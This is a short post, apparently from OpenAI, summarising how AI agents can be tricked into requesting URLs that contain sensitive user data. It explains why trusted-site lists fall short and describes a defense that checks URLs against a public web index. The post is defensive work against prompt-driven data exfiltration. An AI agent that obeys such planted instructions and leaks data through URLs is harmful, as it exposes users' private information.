tech
January 28, 2026
Keeping your data safe when an AI agent clicks a link
AI systems are getting better at taking actions on your behalf, opening a web page, following a link, or loading an image to help answer a question. These useful capabilities also introduce subtle risks that we work tirelessly to mitigate.

TL;DR
- AI systems can be exploited via URL-based data exfiltration attacks.
- Attackers can trick AI into requesting URLs containing sensitive data.
- Simple trusted site lists are not enough due to redirects and user experience limitations.
- OpenAI verifies URLs against an independent web index of publicly known pages.
- If a URL is not found in the public index, it's treated as unverified, requiring user action.
- This system prevents the quiet leaking of user-specific data through URLs.
- It does not guarantee the trustworthiness of web page content or protect against all social engineering or harmful instructions.